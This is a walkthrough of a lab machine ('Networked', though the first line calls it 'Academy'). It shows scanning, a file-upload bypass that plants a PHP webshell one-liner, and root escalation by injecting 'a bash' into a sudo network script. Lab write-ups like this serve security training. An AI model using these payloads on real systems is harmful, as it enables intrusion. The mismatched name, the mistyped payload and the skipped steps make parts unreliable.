Academy is an easy-rated Linux machine from , created by guly. In the current post, my IP is 10.10.14.56, and the target IP is 10.129.170.0
There is nothing complex in the machine Networked, there is a file upload bypass, leading to code execution, here there are many available techniques due to the lack of sanitization. And inside the machine you exploit a crontab and then a poor configured network configuration script.
Recon
The first steps are about getting basic information about the target, by using nmap and searching information from the website.
Local Terminal
$ ping -c 1 10.129.170.0
Pinging 10.129.170.0 with 32 bytes of data:
Reply from 10.129.170.0: bytes=32 time=180ms TTL=63
Reply from 10.129.170.0: bytes=32 time=160ms TTL=63
Reply from 10.129.170.0: bytes=32 time=165ms TTL=63
Reply from 10.129.170.0: bytes=32 time=189ms TTL=63
Ping statistics for 10.129.170.0:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 160ms, Maximum = 189ms, Average = 173ms
By the TTL, we can assume that is a Linux Machine.
Local Terminal
$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.170.0
Nmap scan report for 10.129.170.0
Host is up, received echo-reply ttl 63 (0.19s latency).
Scanned at 2023-06-09 10:08:48 Pacific SA Standard Time for 27s
Not shown: 65500 filtered tcp ports (no-response), 32 filtered tcp ports (host-prohibited), 1 closed tcp port (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 27.10 seconds
Raw packets sent: 131055 (5.766MB) | Rcvd: 47 (2.932KB)
Local Terminal
$ nmap -sCV -p 22,80 10.129.170.0
Nmap scan report for 10.129.170.0
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_ 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.18 seconds/nmap.org/submit/ .
Information that we have now: It's a website (port 80) that use Apache/2.4.6,
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.129.170.0/FUZZ
Total requests: 220546
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000150: 301 7 L 20 W 236 Ch "uploads"
000001612: 301 7 L 20 W 235 Ch "backup"
/uploads/ > Nothing
/backup/ > There is a file, download backup.tar, inside the .tar file you can find four files, index.php, lib.php, photos.php and upload.php
Index.php > Front page
lib.php > Nothing
photos.php > photo gallery, if you can upload, this will be useful.
upload.php > you can upload files, this is the most valuable place by now.
Reverse Shell [apache]
Go to http://10.129.170.0/upload.php and upload any image
As you can see, we can visualice the images uploaded, we want to exploit this. Intercept a file upload.
Now that we know that uploading files is an alternative, our best option is to inject a php command. Add "<?php system($_GET['cmd]); ?>" at the 3rd row, or anywhere. And upload the image.
Browser > http://10.129.170.0/photos.php
Nothing, but before by fuzzing we found a blank site called /uploads/
The image is alone, great, this means that we can apply the command through 'cmd'.
[guly@networked ~]$ id
uid=1000(guly) gid=1000(guly) groups=1000(guly)
[guly@networked ~]$ sudo -l
Matching Defaults entries for guly on networked:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User guly may run the following commands on networked:
(root) NOPASSWD: /usr/local/sbin/changename.sh
Looks like we can execute that custom .sh file as root, let's what's inside
Target Terminal [guly]
cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF # It reads the network-script folder.
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do # There is a interaction with the user
echo "interface $var:"
read x # We can inject a command here
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0
It reads the network-script folder.
Target Terminal [guly]
[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
a bash #write this.
interface PROXY_METHOD:
a
interface BROWSER_ONLY:
a
interface BOOTPROTO:
a